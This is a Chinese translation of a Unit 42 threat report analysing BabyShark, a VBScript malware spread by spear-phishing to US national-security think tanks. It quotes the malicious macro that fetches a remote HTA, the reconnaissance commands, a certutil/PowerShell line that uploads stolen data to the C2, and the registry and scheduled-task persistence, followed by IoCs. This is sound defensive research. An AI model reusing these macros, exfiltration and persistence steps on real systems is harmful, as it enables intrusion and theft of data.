2019年2月，Palo Alto Networks Unit 42的研究人员确定了2018年11月发送的鱼叉式网络钓鱼电子邮件中包含与朝鲜相关活动共享基础设施的新恶意软件。网络钓鱼电子邮件的编写看起来是由核安保专家发送的，目前在美国担任顾问。邮件是使用公用电子邮件地址发送的，并附有专家姓名，主题涉及朝鲜的核问题。这些电子邮件附有一个恶意的Excel宏文档，在执行时会触发一个新的基于Microsoft Visual Basic（VB）脚本的恶意软件，我们将其命名为“BabyShark”。

BabyShark是一种相对较新的恶意软件。我们从开源存储库和内部数据中发现的最早的样本在2018年11月。恶意软件是通过从远程位置执行第一阶段HTA来启动的，因此它可以通过包括PE文件在内的不同文件以及恶意文档进行分发。它将系统信息泄露给C2服务器，维护系统的持久性，并等待操作人员的进一步指令。下面的图1显示了执行流程。

图1 BabyShark执行流程

Unit 42能够确定网络钓鱼电子邮件的目标：

· 当时要召开有关朝鲜无核化问题会议的一所美国大学

· 美国的一家研究机构，作为国家安全问题的智库，也是之前提到的核专家目前的工作单位

我们将搜索范围扩展到公共存储库样本，我们确定了分发BabyShark的其他恶意文档样本。这些样本的原始文件名和诱饵内容表明，威胁行为者有兴趣收集与朝鲜有关的情报，更广泛一点说包括整个东北亚地区。

在调查期间，我们能够找到与其他可疑朝鲜活动的关联; KimJongRAT和STOLEN PENCIL。

一、恶意文档

BabyShark是一种相对较新的恶意软件。我们观察到的第一个样本出自2018年11月。所有分发BabyShark的恶意文件的诱饵都是用英文写的，内容与东北亚的地区安全问题有关。

图2 BabyShark恶意文档及文件名/诱饵的时间轴

虽然一些诱饵使用的内容是互联网上公开可用的信息，但还有一些内容似乎不公开。检查这些非公开内容文档的元数据，我们怀疑威胁行为者可能已入侵了美国国家安全智库中能够访问私密文档的人。

图3从互联网复制的诱饵内容

图4互联网上未公开的诱饵内容（故意混淆）

恶意文档包含一个简单的宏，可从远程位置加载BabyShark的第一阶段HTA。

Sub AutoOpen()
Shell (“mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta”)
End Sub

二、BabyShark恶意软件分析

分析样本的细节：

表1 分析样本的细节

该样本是一个Word文档，其中包含恶意宏加载BabyShark，方法是在下面的远程位置执行第一阶段HTA文件：

https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta

在成功加载第一阶段HTA之后，它向同一C2服务器上的另一个位置发送HTTP GET请求，然后使用以下解码函数对响应内容进行解码。

Function Co00(c)
L=Len(c)
s=””
For jx=0 To d-1
For ix=0 To Int(L/d)-1
s=s&Mid(c,ix*d+jx+1,1)
Next
Next
s=s&Right(c,L-Int(L/d)*d)
Co00=s
End Function

解码后的BabyShark VB脚本首先通过添加以下注册表项为Microsoft Word和Excel启用所有将用到的宏：

HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings, value:1
HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings, value:1
HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings, value:1
HKCU\Software\Microsoft\Office\14.0\WORD\Security\VBAWarnings, value:1
HKCU\Software\Microsoft\Office\15.0\WORD\Security\VBAWarnings, value:1
HKCU\Software\Microsoft\Office\16.0\WORD\Security\VBAWarnings, value:1

然后它发出一系列Windows命令并将结果保存在％AppData％\Microsoft\ttmp.log中。

whoami
hostname
ipconfig /all
net user
dir “%programfiles%”
dir “%programfiles% (x86)”
dir “%programdata%\Microsoft\Windows\Start Menu”
dir “%programdata%\Microsoft\Windows\Start Menu\Programs”
dir “%appdata%\Microsoft\Windows\Recent”
tasklist
ver
set
reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default”

收集的数据使用Windows certutil.exe工具进行编码，然后通过HTTP POST请求上传到C2。

retu=wShell.run(“certutil -f -encode “””&ttmp&””” “””&ttmp1&””””,0,true)
retu=wShell.run(“powershell.exe (New-Object System.Net.WebClient).UploadFile(‘https://tdalpacafarm[.]com/files/kr/contents/upload.php’,'”&ttmp1&”‘);del “””&ttmp1&”””;del “””&ttmp&””””,0,true)

BabyShark添加以下注册表项值以维持持久性并等待来自操作人员的进一步命令。不幸的是，我们无法收集操作人员发布的其他命令。

HKCU\Software\Microsoft\Command Processor\AutoRun, value: “powershell.exe mshta https://tdalpacafarm[.]com/files/kr/contents/Usoro.hta”

启动cmd.exe时，此注册表项将执行字符串值。BabyShark通过将以下脚本注册为计划任务来确保启动cmd.exe：

[%AppData%\Microsoft\Axz\zvftz.vbs]
Set wShell=CreateObject(“WScript.Shell”):retu=wShell.run(“cmd.exe /c taskkill /im cmd.exe”,0,true)
[%AppData%\Adobe\Gqe\urjlt.js]
wShell=new ActiveXObject(“WScript.Shell”);retu=wShell.run(“cmd.exe /c taskkill /im cmd.exe””,0,true);

三、与其他行动的关联

我们注意到BabyShark过去与其他可疑的朝鲜活动有关; KimJongRAT和STOLEN PENCIL。

1.KimJongRAT

· BabyShark和KimJongRAT使用相同的文件路径存储收集的系统信息： %AppData%/Microsoft/ttmp.log。

· KimJongRAT也对国家安全相关目标方面有类似的兴趣。恶意软件随附以下诱饵：

表2 分发KimJongRAT时使用的诱饵文件名

· BabyShark恶意软件背后的威胁行为者在开发恶意软件时经常测试其样本以进行反病毒检测。测试样本包括新编译的KimJongRAT。

表3 新编译的KimJongRAT测试样品

2.STOLEN PENCIL

· PE类型BabyShark加载程序的新编译测试版本已上传到公共示例存储库。样本是使用STOLEN PENCIL活动中使用的被盗签名证书签署的。我们没有注意到使用此证书签署的任何其他恶意软件。

表4  PE型BabyShark Loader样品的签名测试版本

图5 证书详细信息

四、总结

BabyShark正在用于有限的网络钓鱼活动，该活动始于2018年11月，目前仍在进行中。其背后的威胁行动者明确关注收集与东北亚国家安全问题有关的情报。精心设计的鱼叉钓鱼邮件和诱饵表明，威胁行为者很清楚其目标，并密切监视相关社区以收集最新情报。虽然没有定论，但我们怀疑BabyShark背后的威胁攻击者可能与使用KimJongRAT恶意软件系列的同一个攻击者有关，并且至少与负责STOLEN PENCIL活动的威胁人员分享资源。我们还注意到测试文件表明攻击者正在使用BabyShark的PE加载器。威胁行为者可能会使用不同的方法在未来的攻击行动中中投放BabyShark。

Palo Alto Networks的客户可以通过以下方式免受此威胁：

· WildFire和Traps会将此报告中支持的所有恶意软件检测为恶意软件。

· 攻击者使用的C2域名被威胁防御阻止。

AutoFocus客户可以通过查看以下标记来监控本报告中讨论的威胁活动：

· BabyShark

Palo Alto Networks在本报告中与我们的网络威胁联盟成员分享了调查结果，包括文件样本和Ioc指标。CTA成员利用此情报快速部署对客户的保护，并系统的阻断恶意网络行为者。有关网络威胁联盟的更多信息，请访问cyberthreatalliance.org。

IoCs

恶意文档:

· 7b77112ac7cbb7193bcd891ce48ab2acff35e4f8d523980dff834cb42eaffafa

· 9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8

· 2b6dc1a826a4d5d5de5a30b458e6ed995a4cfb9cad8114d1197541a86905d60e

· 66439f0e377bbe8cda3e516e801a86c64688e7c3dde0287b1bfb298a5bdbc2a2

· 8ef4bc09a9534910617834457114b9217cac9cb33ae22b37889040cde4cabea6

· 331d17dbe4ee61d8f2c91d7e4af17fb38102003663872223efaa4a15099554d7

· 1334c087390fb946c894c1863dfc9f0a659f594a3d6307fb48f24c30a23e0fc0

· dc425e93e83fe02da9c76b56f6fd286eace282eaad6d8d497e17b3ec4059020a

· 94a09aff59c0c27d1049509032d5ba05e9285fd522eb20b033b8188e0fee4ff0

PE版loader, 使用窃取的证书签名:

· 6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c

本文翻译自：https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

翻译作者：TRex  阅读原文：https://www.4hou.com/web/16366.html